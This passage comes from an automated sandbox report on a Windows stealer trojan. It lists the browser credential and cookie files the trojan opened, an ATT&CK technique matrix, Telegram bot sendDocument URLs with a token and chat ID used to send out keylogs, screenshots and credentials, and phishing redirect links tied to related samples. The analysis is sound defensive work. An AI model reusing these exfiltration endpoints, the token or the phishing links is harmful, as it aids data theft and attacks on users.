                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\KATAXZVCPS.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\MNULNCRIYC.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ONBQCLYSPU.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PSAMNLJHZW.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PWZOQIFCAN.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\TQDGENUHWP.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WKXEWIOTXI.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WUTJSCBCFX.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\XZXHAVGRAG.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\XZXHAVGRAG.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\YPSIACHYXW.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.xlsx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 6524, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 4676, type: MEMORYSTR
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                    Remote Access Functionality

                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 6524, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 4676, type: MEMORYSTR
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 Scheduled Task/Job | 112 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Input Capture | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | 1 Input Capture | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 112 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 22 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    [Behavior graph] Behavior Graph ID: 1564115, Sample: oS6KsQIqJxe038Y.exe, Startdate: 27/11/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label | Link
                    oS6KsQIqJxe038Y.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |
                    oS6KsQIqJxe038Y.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\XgbXowhljC.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\XgbXowhljC.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    http://showip.net/e- | 0% | Avira URL Cloud | safe |
                    https://www.trtworld.com/#frmActiveBrowsers | 0% | Avira URL Cloud | safe |

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    showip.net | 162.55.60.2 | true | false | | high
                    api.telegram.org | 149.154.167.220 | true | false | | high

                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 | false | | high
                    https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 | false | | high
                    https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 | false | | high

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://www.mgm.gov.tr/?il=manisa | oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr | false | | high
                    https://api.telegram.org/mplates | XgbXowhljC.exe, 0000000E.00000002.3407510611.0000000004010000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/api.telegram.org | oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732 | XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/ocUnique | oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot | oS6KsQIqJxe038Y.exe, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMP | oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/0 | XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/. | oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/ | oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/8 | XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs | oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePXgbXowhljC.exe, 0000000B.00000002.2291217651.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.telegram.org/ZXgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmboS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameoS6KsQIqJxe038Y.exe, 00000000.00000002.2264000411.0000000002D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=toS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://showip.net/oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://showip.net/e-oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.trtworld.com/#frmActiveBrowsersoS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
162.55.60.2 | showip.net | United States | 35893 | ACPCA | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1564115
Start date and time: 2024-11-27 20:45:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: oS6KsQIqJxe038Y.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@19/52@3/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 140
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target XgbXowhljC.exe, PID 4848 because it is empty
• Execution Graph export aborted for target oS6KsQIqJxe038Y.exe, PID 4676 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: oS6KsQIqJxe038Y.exe
Time | Type | Description
14:46:14 | API Interceptor | 2005x Sleep call for process: oS6KsQIqJxe038Y.exe modified
14:46:17 | API Interceptor | 26x Sleep call for process: powershell.exe modified
14:46:24 | API Interceptor | 2000x Sleep call for process: XgbXowhljC.exe modified
20:46:24 | Task Scheduler | Run new task: XgbXowhljC path: C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220hesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        file.exeGet hashmaliciousDynamic StealerBrowse
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                            eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                              Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                  z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                                      162.55.60.2Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                                      • showip.net/
                                                                                      MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • showip.net/
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • showip.net/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      showip.netPurchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                                      • 162.55.60.2
                                                                                      MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                      • 162.55.60.2
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 162.55.60.2
                                                                                      api.telegram.orghesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousDynamic StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXi